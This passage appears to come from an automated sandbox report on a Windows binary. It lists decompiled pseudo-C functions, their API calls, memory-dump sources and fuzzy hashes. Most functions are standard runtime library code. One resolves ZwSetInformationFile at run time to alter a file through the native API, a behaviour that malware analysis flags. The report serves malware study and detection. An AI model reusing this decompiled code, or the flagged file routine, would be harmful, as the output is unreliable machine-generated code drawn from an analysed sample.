											 *((intOrPtr*)(_t45 + 0x10)) = 0;
											 *_t45 = 0x437540;
											 *((intOrPtr*)(_t45 + 0x18)) = 0;
											 *((intOrPtr*)(_t45 + 0x1c)) = 0;
											 *((intOrPtr*)(_t45 + 0x20)) = 0;
										}
										_t70 = _v32;
										 *_t87 = _t45;
										_t87[1] = _t45;
										_t87[3] = _v36;
										_t87[2] = _t70;
										_t87[4] =  !(_t70 >> 3) & 0x00000100;
										_t73 =  !(_t70 >> 9) & 0x00000004;
										__eflags = _t73;
										_t87[5] = _t73;
										return _t87;
									} else {
										_t85 = _v24;
										 *0x44c818 = _t85;
										 *((intOrPtr*)( *_t85 + 4))();
										E00413D84(__eflags, _t85);
										_t96 = _t98 + 4;
										goto L16;
									}
								} else {
									E004133F5( &_v16);
									return _t64;
								}
							} else {
								_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t56 + 8)) + _t81 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00403c90
0x00403c90
0x00403c9d
0x00403ca2
0x00403ca8
0x00403cae
0x00403cb4
0x00403cbb
0x00403cc0
0x00403cc6
0x00403cc8
0x00403ccd
0x00403cce
0x00403cd3
0x00403cd3
0x00403cdc
0x00403ce1
0x00403ce1
0x00403ce7
0x00403ceb
0x00403cf1
0x00403cff
0x00403cff
0x00000000
0x00403cf3
0x00403cf6
0x00403cfb
0x00403d61
0x00403d65
0x00403d73
0x00403cfd
0x00403d01
0x00403d05
0x00403d17
0x00403d19
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d07
0x00403d07
0x00403d0f
0x00403d1b
0x00403d1d
0x00403d3a
0x00403d3f
0x00403d42
0x00403d45
0x00403d74
0x00403d77
0x00403d88
0x00403d8f
0x00403d97
0x00403d9c
0x00403d9d
0x00403d9e
0x00403d9f
0x00403da0
0x00403da3
0x00403da5
0x00403dad
0x00403daf
0x00403dea
0x00403dea
0x00403db1
0x00403db1
0x00403db8
0x00403dbf
0x00403dc6
0x00403dcd
0x00403dd3
0x00403dda
0x00403de1
0x00403de1
0x00403dec
0x00403df0
0x00403df2
0x00403df9
0x00403dfe
0x00403e10
0x00403e13
0x00403e13
0x00403e16
0x00403e1c
0x00403d47
0x00403d47
0x00403d4d
0x00403d55
0x00403d59
0x00403d5e
0x00000000
0x00403d5e
0x00403d1f
0x00403d25
0x00403d33
0x00403d33
0x00403d11
0x00403d14
0x00000000
0x00403d14
0x00403d0f
0x00403d05
0x00403cfb

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00403C9D
std::_Lockit::_Lockit.LIBCPMT ref: 00403CBB
std::_Lockit::~_Lockit.LIBCPMT ref: 00403CDC
std::_Lockit::~_Lockit.LIBCPMT ref: 00403D25

Part of subcall function 00409B00: new.LIBCMT ref: 00409B1A

std::_Facet_Register.LIBCPMT ref: 00403D59

Part of subcall function 00413D84: new.LIBCMT ref: 00413D8A

std::_Lockit::~_Lockit.LIBCPMT ref: 00403D65
__CxxThrowException@8.LIBVCRUNTIME ref: 00403D97

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$DispatcherExceptionException@8Facet_RegisterThrowUser
String ID:
API String ID: 2318137220-0
Opcode ID: 17c0d03751a289bfae8d991e0b833ba1d61c1438d4bdfed12207cab91717db22
Instruction ID: b6f1b007d6f67cf196b3c46ea6f4c3cc9b91148107ed40a2d0ad66eb4beb2890
Opcode Fuzzy Hash: 17c0d03751a289bfae8d991e0b833ba1d61c1438d4bdfed12207cab91717db22
Instruction Fuzzy Hash: D53129755043058BC310EF18D88155AB7E8EF95325F15057FF850A32A1DB38BE85CB9A

Uniqueness

Uniqueness Score: 100.00%

Function 004100EF, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 91
memorystringUNIQUE

Download Yara Rule

C-Code - Quality: 89%

			E004100EF(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _t22;
				void* _t30;
				intOrPtr* _t34;
				void* _t35;
				void* _t37;
				void* _t42;
				intOrPtr _t44;
				void* _t45;

				_v5 = 0;
				_t42 = E0041005F(_a4, 1);
				_t44 = lstrlenW(_t42) + _t21;
				_t3 = _t44 + 0x10; // 0x10
				_t22 = _t3;
				_v12 = _t22;
				_t37 = VirtualAlloc(0, _t22 + 2, 0x3000, 4);
				_t5 = _t37 + 0xc; // 0xc
				E0040C6E6(_t5, _t42, _t44);
				 *_t37 = 1;
				 *((intOrPtr*)(_t37 + 8)) = _t44;
				_v20 = E0041005F(_a8, 1);
				_t45 = E004101F1(_t27, 0, 0x2000000, 1, 0);
				_v16 = _t45;
				if(_t45 != 0) {
					_t34 = E004101D7("ZwSetInformationFile");
					_v28 = _v28 & 0x00000000;
					_v24 = _v24 & 0x00000000;
					_t35 =  *_t34(_t45,  &_v28, _t37, _v12, 0xb);
					CloseHandle(_v16);
					if(_t35 >= 0) {
						_v5 = 1;
					}
				}
				if(_t42 != 0) {
					VirtualFree(_t42, 0, 0x8000);
				}
				VirtualFree(_t37, 0, 0x8000);
				_t30 = _v20;
				if(_t30 != 0) {
					VirtualFree(_t30, 0, 0x8000);
				}
				return _v5;
			}

0x004100fd
0x00410108
0x00410113
0x0041011c
0x0041011c
0x0041011f
0x0041012e
0x00410132
0x00410136
0x00410140
0x00410143
0x00410157
0x0041015f
0x00410164
0x00410169
0x00410170
0x00410175
0x00410179
0x00410189
0x00410190
0x00410198
0x0041019a
0x0041019a
0x00410198
0x004101a6
0x004101b0
0x004101b0
0x004101ba
0x004101bc
0x004101c1
0x004101cb
0x004101cb
0x004101d6

APIs

Part of subcall function 0041005F: VirtualAlloc.KERNEL32(00000000,0000FFFE,00003000,00000004,00000000,00000000,00000000,?,00410106,00000000,00000001,00000000,00000000,00000000), ref: 0041007A
Part of subcall function 0041005F: lstrlenW.KERNEL32(00000000,00003000,00000004,?,00410106,00000000,00000001,00000000,00000000,00000000,?,?,?,0040F62D,00000000,00000000), ref: 0041008C
Part of subcall function 0041005F: VirtualAlloc.KERNEL32(00000000,00000000,?,00410106,00000000,00000001,00000000,00000000,00000000,?,?,?,0040F62D,00000000,00000000), ref: 0041009B
Part of subcall function 0041005F: GetFullPathNameW.KERNEL32(00000000,0000FFFE,00000000,00000000,?,00410106,00000000,00000001,00000000,00000000,00000000,?,?,?,0040F62D,00000000), ref: 004100C3
Part of subcall function 0041005F: VirtualFree.KERNEL32(00000000,00000000,00008000,?,00410106,00000000,00000001,00000000,00000000,00000000,?,?,?,0040F62D,00000000,00000000), ref: 004100E2

lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0040F62D,00000000,00000000), ref: 0041010B
VirtualAlloc.KERNEL32(00000000,0000000E,00003000,00000004,?,?,?,0040F62D,00000000,00000000), ref: 00410128
CloseHandle.KERNEL32(0040F62D), ref: 00410190
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004101B0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004101BA
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004101CB

Part of subcall function 004101D7: GetModuleHandleW.KERNEL32(ntdll,00000000,?,0041021E,RtlInitUnicodeString,00000000,00000000,00000000,0041015F,00000000,00000000,02000000,00000001,00000000,0040F62D,00000001), ref: 004101E2
Part of subcall function 004101D7: GetProcAddress.KERNEL32(00000000,?,0041021E,RtlInitUnicodeString,00000000,00000000,00000000,0041015F,00000000,00000000,02000000,00000001,00000000,0040F62D,00000001,0000000C), ref: 004101E9

Strings

ZwSetInformationFile, xrefs: 0041016B

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$Free$Alloc$Handlelstrlen$AddressCloseFullModuleNamePathProc
String ID: ZwSetInformationFile
API String ID: 4045586616-1872214626
Opcode ID: cc50eca7b87ac5c599a3c9c6fef4f65a3718d6ab93fd1e27608ed133b90fe81f
Instruction ID: 72c8e1602cfceca8b594a686dde66830e0e69767ed5d0410f57c039942f098d1
Opcode Fuzzy Hash: cc50eca7b87ac5c599a3c9c6fef4f65a3718d6ab93fd1e27608ed133b90fe81f
Instruction Fuzzy Hash: FA21A831E403147AEB315BA58C46FEE7FA89B04B64F14405AFE04BA2C1D6FD59C487A8

Uniqueness

Uniqueness Score: 100.00%

Function 0042E50C, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E50C(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0042E256(_t45, 7);
					E0042E256(_t45 + 0x1c, 7);
					E0042E256(_t45 + 0x38, 0xc);
					E0042E256(_t45 + 0x68, 0xc);
					E0042E256(_t45 + 0x98, 2);
					E004214E2( *((intOrPtr*)(_t45 + 0xa0)));
					E004214E2( *((intOrPtr*)(_t45 + 0xa4)));
					E004214E2( *((intOrPtr*)(_t45 + 0xa8)));
					E0042E256(_t45 + 0xb4, 7);
					E0042E256(_t45 + 0xd0, 7);
					E0042E256(_t45 + 0xec, 0xc);
					E0042E256(_t45 + 0x11c, 0xc);
					E0042E256(_t45 + 0x14c, 2);
					E004214E2( *((intOrPtr*)(_t45 + 0x154)));
					E004214E2( *((intOrPtr*)(_t45 + 0x158)));
					E004214E2( *((intOrPtr*)(_t45 + 0x15c)));
					return E004214E2( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x0042e512
0x0042e517
0x0042e520
0x0042e52b
0x0042e536
0x0042e541
0x0042e54f
0x0042e55a
0x0042e565
0x0042e570
0x0042e57e
0x0042e58c
0x0042e59d
0x0042e5ab
0x0042e5b9
0x0042e5c4
0x0042e5cf
0x0042e5da
0x00000000
0x0042e5ea
0x0042e5ef

APIs

Part of subcall function 0042E256: _free.LIBCMT ref: 0042E27B

_free.LIBCMT ref: 0042E55A

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 0042E565
_free.LIBCMT ref: 0042E570
_free.LIBCMT ref: 0042E5C4
_free.LIBCMT ref: 0042E5CF
_free.LIBCMT ref: 0042E5DA
_free.LIBCMT ref: 0042E5E5

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 150946c35df92892ed23fd3e23a25567def55629ba1bbc8098ed5fed1bff994b
Instruction ID: 5debdd7b8c2629ab3a9f3fe8e54ee6e1326295ef9251ba783bda560b9169eb07
Opcode Fuzzy Hash: 150946c35df92892ed23fd3e23a25567def55629ba1bbc8098ed5fed1bff994b
Instruction Fuzzy Hash: BA116031640724E6D530BBB2DD87FCB779D5F40744FC0481EB69E66062D63CA5048768

Uniqueness

Uniqueness Score: 0.14%

Function 0042E50C, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0042E256: _free.LIBCMT ref: 0042E27B

_free.LIBCMT ref: 0042E55A

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 0042E565
_free.LIBCMT ref: 0042E570
_free.LIBCMT ref: 0042E5C4
_free.LIBCMT ref: 0042E5CF
_free.LIBCMT ref: 0042E5DA
_free.LIBCMT ref: 0042E5E5

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42d700b825b46556a18d97b020d1fce8fb5ef4feacfc2fa70d624376a4661490
Instruction ID: 5debdd7b8c2629ab3a9f3fe8e54ee6e1326295ef9251ba783bda560b9169eb07
Opcode Fuzzy Hash: 42d700b825b46556a18d97b020d1fce8fb5ef4feacfc2fa70d624376a4661490
Instruction Fuzzy Hash: BA116031640724E6D530BBB2DD87FCB779D5F40744FC0481EB69E66062D63CA5048768

Uniqueness

Uniqueness Score: 0.14%

Function 0041A204, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A204(void* __ecx) {
				void* _t4;
				void* _t11;
				long _t25;
				void* _t28;

				if( *0x44b6e0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E0041A058(__eflags,  *0x44b6e0);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E0041A092(__eflags,  *0x44b6e0, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E00420EFE(1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E0041A092(__eflags,  *0x44b6e0, 0);
								} else {
									__eflags = E0041A092(__eflags,  *0x44b6e0, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E004214E2(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x0041a20b
0x0041a21e
0x0041a225
0x0041a228
0x0041a22b
0x0041a244
0x0041a244
0x0041a22d
0x0041a22d
0x0041a22f
0x0041a239
0x0041a240
0x0041a242
0x0041a252
0x0041a256
0x0041a258
0x0041a26c
0x0041a26c
0x0041a275
0x0041a25a
0x0041a268
0x0041a26a
0x0041a27e
0x0041a280
0x0041a280
0x00000000
0x00000000
0x00000000
0x0041a26a
0x0041a283
0x00000000
0x00000000
0x00000000
0x0041a242
0x0041a22f
0x0041a28b
0x0041a295
0x0041a20d
0x0041a20f
0x0041a20f

APIs

GetLastError.KERNEL32(?,?,0041A1FB,00416DE9), ref: 0041A212
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0041A220

Part of subcall function 0041A058: try_get_function.LIBVCRUNTIME ref: 0041A06D
Part of subcall function 0041A058: TlsGetValue.KERNEL32(00416DE9,?,0041A1FB,00416DE9), ref: 0041A089

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0041A239

Part of subcall function 0041A092: try_get_function.LIBVCRUNTIME ref: 0041A0A7
Part of subcall function 0041A092: TlsSetValue.KERNEL32(00000000,?), ref: 0041A0C6

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0041A261
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0041A275
_free.LIBCMT ref: 0041A283

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

SetLastError.KERNEL32(00000000,?,0041A1FB,00416DE9), ref: 0041A28B

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Value$___vcrt_$ErrorLast$Heaptry_get_function$AllocateFree_free
String ID:
API String ID: 3950751670-0
Opcode ID: 34a5256c179cfaddf8fed4258b614a00272d4ed7930b4b8c00364e8e31b62917
Instruction ID: 85dc2e7bbe98e1809f9329df882371b083f7054f74a1c4d720ade8aa08b87479
Opcode Fuzzy Hash: 34a5256c179cfaddf8fed4258b614a00272d4ed7930b4b8c00364e8e31b62917
Instruction Fuzzy Hash: 0901B93220A3215EE6252BB56C8659B2B94D716374721037FF514417E1EF7A4CA1528F

Uniqueness

Uniqueness Score: 2.71%

Function 0041005F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59
memorystringUNIQUE

Download Yara Rule

C-Code - Quality: 67%

			E0041005F(WCHAR* _a4, long _a8) {
				void* _t7;
				void* _t21;
				long _t23;

				_t7 = VirtualAlloc(0, 0xfffe, 0x3000, 4);
				_t21 = _t7;
				if(_t21 != 0) {
					_t23 = VirtualAlloc(0, 0x10000 + lstrlenW(_a4) * 2, 0x3000, 4);
					if(_t23 != 0) {
						__eflags = _a8;
						if(_a8 != 0) {
							E004102BB(_t23, L"\\??\\");
						}
						__eflags = GetFullPathNameW(_a4, 0xfffe, _t21, 0);
						if(__eflags == 0) {
							_push(_a4);
						} else {
							_push(_t21);
						}
						_push(_t23);
						E0041029A(__eflags);
					} else {
						_t23 = 0;
					}
					VirtualFree(_t21, 0, 0x8000);
					return _t23;
				}
				return _t7;
			}

0x0041007a
0x0041007c
0x00410080
0x0041009d
0x004100a1
0x004100a7
0x004100aa
0x004100b2
0x004100b8
0x004100c9
0x004100cb
0x004100d0
0x004100cd
0x004100cd
0x004100cd
0x004100d3
0x004100d4
0x004100a3
0x004100a3
0x004100a3
0x004100e2
0x00000000
0x004100e8
0x004100ee

APIs

VirtualAlloc.KERNEL32(00000000,0000FFFE,00003000,00000004,00000000,00000000,00000000,?,00410106,00000000,00000001,00000000,00000000,00000000), ref: 0041007A
lstrlenW.KERNEL32(00000000,00003000,00000004,?,00410106,00000000,00000001,00000000,00000000,00000000,?,?,?,0040F62D,00000000,00000000), ref: 0041008C
VirtualAlloc.KERNEL32(00000000,00000000,?,00410106,00000000,00000001,00000000,00000000,00000000,?,?,?,0040F62D,00000000,00000000), ref: 0041009B
GetFullPathNameW.KERNEL32(00000000,0000FFFE,00000000,00000000,?,00410106,00000000,00000001,00000000,00000000,00000000,?,?,?,0040F62D,00000000), ref: 004100C3
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00410106,00000000,00000001,00000000,00000000,00000000,?,?,?,0040F62D,00000000,00000000), ref: 004100E2

Strings

\??\, xrefs: 004100AC

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$Alloc$FreeFullNamePathlstrlen
String ID: \??\
API String ID: 508751317-3047946824
Opcode ID: 0e76b1bdcc0ed5ce64f148736bade28fc0c843744ea3609f6c20b58a0db81bd6
Instruction ID: a6705039efd517eb13be1160761cd37569e81ae5255ee2ead483ebd52e72453c
Opcode Fuzzy Hash: 0e76b1bdcc0ed5ce64f148736bade28fc0c843744ea3609f6c20b58a0db81bd6
Instruction Fuzzy Hash: 0101F5316413197AE7221711BC45FEB2F5CDB49BA4F108037FB05AA1A0DAE59DC047AC

Uniqueness

Uniqueness Score: 100.00%

Function 004268FF, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E004268FF(void* __eflags, intOrPtr _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t182;
				intOrPtr _t185;
				void* _t187;
				void* _t189;
				long _t192;
				void _t197;
				long _t201;
				void* _t205;
				intOrPtr _t211;
				signed char* _t212;
				char _t215;
				signed int _t218;
				char* _t219;
				void* _t221;
				long _t227;
				intOrPtr _t228;
				char _t230;
				long _t234;
				struct _OVERLAPPED* _t242;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t279;
				long _t280;
				struct _OVERLAPPED* _t281;
				signed int _t283;
				intOrPtr _t285;
				signed int _t288;
				signed int _t291;
				long _t292;
				long _t293;
				signed int _t294;
				intOrPtr _t295;
				signed int _t296;
				void* _t297;
				void* _t298;

				_t172 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t172 ^ _t296;
				_t174 = _a8;
				_t263 = _a12;
				_t283 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_v80 = _t283;
				_t285 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t283 +  *((intOrPtr*)(0x44df78 + _t246 * 4)) + 0x18));
				_v104 = _t285;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E0041B23E( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t285) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t288 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t242;
						_v44 = 1;
						_t185 =  *((intOrPtr*)(0x44df78 + _v84 * 4));
						_v52 = _t185;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t211 = _t185 + 0x2e + _t265;
						_t256 = _t242;
						_v108 = _t211;
						while( *((intOrPtr*)(_t211 + _t256)) != _t242) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t212 = _v40;
						_t279 = _v104 - _t212;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t212 & 0x000000ff) + 0x44bef8)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t279;
							if(_t258 > _t279) {
								__eflags = _t279;
								if(_t279 <= 0) {
									goto L44;
								} else {
									_t292 = _v40;
									do {
										_t266 = _t265 + _t242;
										_t215 =  *((intOrPtr*)(_t242 + _t292));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0x44df78 + _v84 * 4)) + 0x2e)) = _t215;
										_t265 = _v80;
										__eflags = _t242 - _t279;
									} while (_t242 < _t279);
									goto L43;
								}
							} else {
								_t280 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t242;
								_t260 =  &_v144;
								_v140 = _t242;
								_v56 = _t280;
								_t218 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t218;
								_push( &_v144);
								_v44 = _t218;
								_push(_t218);
								_t219 =  &_v56;
								goto L21;
							}
						} else {
							_t227 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0x44bef8)) + 1;
							_v56 = _t227;
							_t228 = _t227 - _t256;
							_v52 = _t228;
							if(_t228 > _t279) {
								__eflags = _t279;
								if(_t279 > 0) {
									_t293 = _v40;
									do {
										_t268 = _t265 + _t242 + _t256;
										_t230 =  *((intOrPtr*)(_t242 + _t293));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0x44df78 + _v84 * 4)) + 0x2e)) = _t230;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t242 - _t279;
									} while (_t242 < _t279);
									L43:
									_t288 = _v92;
								}
								L44:
								_t291 = _t288 + _t279;
								__eflags = _t291;
								L45:
								__eflags = _v60;
								_v92 = _t291;
							} else {
								_t269 = _t242;
								if(_t256 > 0) {
									_t295 = _v108;
									do {
										 *((char*)(_t296 + _t269 - 0xc)) =  *((intOrPtr*)(_t295 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t228 = _v52;
								}
								_t280 = _v40;
								if(_t228 > 0) {
									E004170E0( &_v16 + _t256, _t280, _v52);
									_t256 = _v44;
									_t297 = _t297 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t281 = _t242;
									_t294 = _v80;
									do {
										_t262 = _t294 + _t281;
										_t281 =  &(_t281->Internal);
										 *(_t262 +  *((intOrPtr*)(0x44df78 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t281 < _t270);
									_t280 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t234 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t234;
								_push(_t234);
								_t219 =  &_v120;
								L21:
								_push(_t219);
								_push( &_v76);
								_t221 = E004304DB(_t260);
								_t298 = _t297 + 0x10;
								if(_t221 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t280 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t192 = E0042C2CD(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t297 = _t298 + 0x20;
									_v56 = _t192;
									if(_t192 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t192,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t288 = _v88 - _v112 + _t275;
											_v92 = _t288;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t197 = 0xd;
													_v48 = _t197;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t288 = _t288 + 1;
															_v92 = _t288;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t185 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t187 = E00420F5B(_t264);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t187 + _t253 * 2)) - _t242;
							if( *((intOrPtr*)(_t187 + _t253 * 2)) >= _t242) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t201 = _t275 + 1;
								_v56 = _t201;
								__eflags = _t201 - _v104;
								if(_t201 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0x44df78 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0x44df78 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x44df78 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t291 = _t288 + 1;
									goto L45;
								} else {
									_t205 = E00428379( &_v76, _t275, 2);
									_t298 = _t297 + 0xc;
									__eflags = _t205 - 0xffffffff;
									if(_t205 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t185 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t189 = E00428379();
							_t298 = _t297 + 0xc;
							__eflags = _t189 - 0xffffffff;
							if(_t189 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
